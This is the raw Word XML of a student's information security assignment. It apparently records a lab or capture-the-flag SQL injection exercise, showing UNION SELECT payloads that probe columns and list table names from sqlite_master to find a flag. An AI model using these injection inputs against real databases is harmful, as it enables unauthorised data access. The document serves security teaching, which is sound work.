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B8F82" w14:textId="357B73B2" w:rsidR="00455D3B" w:rsidRPr="0035023A" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035023A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Security A-03 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0CBEF" w14:textId="7DB54468" w:rsidR="0035023A" w:rsidRPr="0035023A" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035023A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tauha Imran 22i-1239 cs-g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F0DEA" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="91498189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22B06415" w14:textId="65F5BFC2" w:rsidR="0035023A" w:rsidRDefault="0035023A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0D0D07AA" w14:textId="40458371" w:rsidR="0035023A" w:rsidRDefault="0035023A">
          <w:pPr>
            <w:pStyle w:val="TOC2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67870" w:history="1">
            <w:r w:rsidRPr="00581377">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>01 SQL Injection - Basic Exploit a basic SQL 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_Toc214867870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C4B13" w14:textId="45D05FBD" w:rsidR="0035023A" w:rsidRDefault="0035023A">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5E183C96" w14:textId="104C91EC" w:rsidR="0035023A" w:rsidRDefault="0035023A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486D390" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A"/>
    <w:p w14:paraId="68AD0839" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc214867870"/>
      <w:r w:rsidRPr="00455D3B">
        <w:t>01 SQL Injection - Basic Exploit a basic SQL Query</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5C8EADC3" w14:textId="77777777" w:rsidR="0035023A" w:rsidRDefault="0035023A"/>
    <w:p w14:paraId="34B8319B" w14:textId="603453FF" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:t>Testing basic query , got basic table and user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06C783" w14:textId="2B088AD9" w:rsidR="0035023A" w:rsidRDefault="0035023A">
      <w:r>
        <w:t>query: %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A1A55" w14:textId="77777777" w:rsidR="0063785B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="3B3E1F9A">
            <wp:extent cx="5411349" cy="3040083"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="812995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423" cy="305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54538" w14:textId="6E3FC63A" w:rsidR="0063785B" w:rsidRDefault="00C93184">
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="0063785B">
        <w:t xml:space="preserve">uery: </w:t>
      </w:r>
      <w:r w:rsidR="0063785B" w:rsidRPr="0063785B">
        <w:t>%' UNION SELECT 1,2,3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F57B43" w14:textId="2B4A6731" w:rsidR="0063785B" w:rsidRDefault="0063785B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="7F6AB211">
            <wp:extent cx="5403273" cy="3035547"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1998281954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81954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5683" cy="3048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4CF28" w14:textId="5BDD9D93" w:rsidR="0063785B" w:rsidRDefault="0063785B"/>
    <w:p w14:paraId="2C700691" w14:textId="431D5E41" w:rsidR="00455D3B" w:rsidRDefault="00455D3B"/>
    <w:p w14:paraId="47B6C28C" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:t>This way I can tell that this is injectable because results are showing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED0E5B" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="26D7DA42">
            <wp:extent cx="5284519" cy="2968831"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="18821544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639" cy="2970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D61F8" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRDefault="00455D3B"/>
    <w:p w14:paraId="6F2B0640" w14:textId="164DF816" w:rsidR="00455D3B" w:rsidRDefault="00455D3B">
      <w:r>
        <w:t>Getting all the table names to find the flag</w:t>
      </w:r>
      <w:r w:rsidR="00D71DC9">
        <w:br/>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B">
        <w:t xml:space="preserve">uery: </w:t>
      </w:r>
      <w:r w:rsidR="00587E9F">
        <w:t>%’</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00A5156B">
        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM sqlite_master WHERE type='table' --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128E2D00" wp14:editId="50173EFA">
            <wp:extent cx="5260769" cy="2955488"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111089416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185" cy="29635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55D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992"/>
    <w:rsid w:val="00040992"/>
    <w:rsid w:val="00121D3D"/>
    <w:rsid w:val="0035023A"/>
    <w:rsid w:val="00365D7A"/>
    <w:rsid w:val="00455D3B"/>
    <w:rsid w:val="00587E9F"/>
    <w:rsid w:val="0063785B"/>
    <w:rsid w:val="00A17C28"/>
    <w:rsid w:val="00A5156B"/>
    <w:rsid w:val="00A55C7C"/>
    <w:rsid w:val="00C242B1"/>
    <w:rsid w:val="00C93184"/>
    <w:rsid w:val="00D71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F0D27"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0306C01-2806-49C5-A47D-920DFBADC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09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09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9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9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9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9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9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9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9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9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09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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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992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5023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5023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35023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0AB88C-E500-4965-A6C8-F697562774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85</Words>
  <Characters>487</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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Tauha Imran</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tauha Imran</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-24T04:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-24T04:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>